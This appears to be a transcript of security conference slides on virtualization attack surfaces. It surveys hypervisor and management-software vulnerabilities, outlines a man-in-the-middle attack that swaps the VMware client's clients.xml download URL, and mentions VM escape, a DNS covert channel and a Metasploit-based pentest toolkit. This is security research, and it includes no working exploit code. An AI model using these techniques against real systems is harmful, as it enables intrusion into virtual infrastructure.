the glass cage virtualization security - secure network · the glass cage virtualization security...
TRANSCRIPT
The Glass CageVirtualization security
Claudio Criscione
ClaudioCriscione
Nibble Security
What is this speech about?
Breaking out of the cage vendors are trying to put on your mind!
Virtualization in 3 Minutes
Hardware
Hypervisor
Host Operating System
Design in the virtualization era
Mail Server
Web Server
DNS Server
Firewall
The Original Sin
Il peccato originale – la sicurezza della virt è uguale a quella fisica
The Original SinThe Original Sin
It is very practical to think about the cloud
It is not really there!
What you have is more systems
If it bleeds...
Hypervisors are running on top of “standard” OS
Linux, Windows 2008, Nemesis
And they are running services as well!
VMSA-0008-0002.1 Patches Virtual Center: running tomcat 5.5.17
VMSA-0008-0015Patches remote buffer overflow in openwsman
CVE-2007-1321Heap Overflow in Xen NE2000 network driver
Hyper-VSMBv2 anyone?
More than just Hypervisors
There's a whole ecosystem around virtualization
Management softwareStorage managers
PatchersConversion software
All of them can be hacked!
SN-2009-02 - ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Client insicuri
Client security
The attack surface is quite large
SSLWeb Services
Rendering enginesIntegration & Plugins
Auto-update functionalities
MITM Against Clients?Why not!
With or without null byte
/client/clients.xml
Requested every time VI client connects to a host
<ConfigRoot> <clientConnection id="0000"> <authdPort>902</authdPort> <version>3</version> <patchVersion>3.0.0</patchVersion> <apiVersion>3.1.0</apiVersion> <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl> </clientConnection></ConfigRoot>
What if we change that XML?
By MitMor
Post-exploitation on the host
Demo time
Just woke up?Here's what's going on
VI Client looks for clients.xmlWe do some MiTM
We use Burp because it rocks and it's easy
Change the clients.xmlP0wned
AdministrativeInterfaceSecurity
Glass windows in the castle
Some of them are even hidden...
...and some of them are broken.
XEN Center Web
Multiple vulnerabilities in the default installation
RCE, File inclusion, XSS
SN-2009-01 – Alberto Trivero & Claudio Criscione
People were actually using it, over the internet
But now it's gone...
VMware Studio
A virtual appliance to build other virtual appliances
Path traversal leading to unauthenticated arbitrary file upload to any directory
SN-2009-03 by Claudio criscione
Virtualization ASsessment TOolkit
A toolkit for virtualization penetration testing
Currently under development @ Secure Network
Metasploit based
Still in early Alpha stage
Stable modules:FingerprintingBrute Forcer
VMware Studio Exploiter
Let's see them (if we have time!)
Everyone has got some...
Ubuntu just launched its Cloud infrastructureIt leverages Eucalyptus
And we have (at least) an XSS in Eucalytpus
VM hopping
VM Hopping
You already knew about that, or at least thought about that
It already happened multiple times, e.g.
CloudBurst on VMwareCVE-2007-1320 on XEN Overflow in Cirrus VGA: see a pattern?
Virtual Appliances
Virtual Appliances
Sistemi di monitoraggio
Monitoring
Virtual Appliances + Monitoring = Nice Example
Astaro virtual firewall
One pre-auth request to the HTTP interface will result in Astaro doing a DNS query
We won't get the results, but it's a nice one-way covert channel for any blind attack (tnx ikki)
What's most important, no IDS in the network will detect any anomaly. It's all in-memory
Templates
So what
Virtualization Management Review
Virtualization Architecture Review
And now you know VASTO is coming
What about management issues?
VMSprawl
VM Sprawl
Segregation of duties
Segregation of duties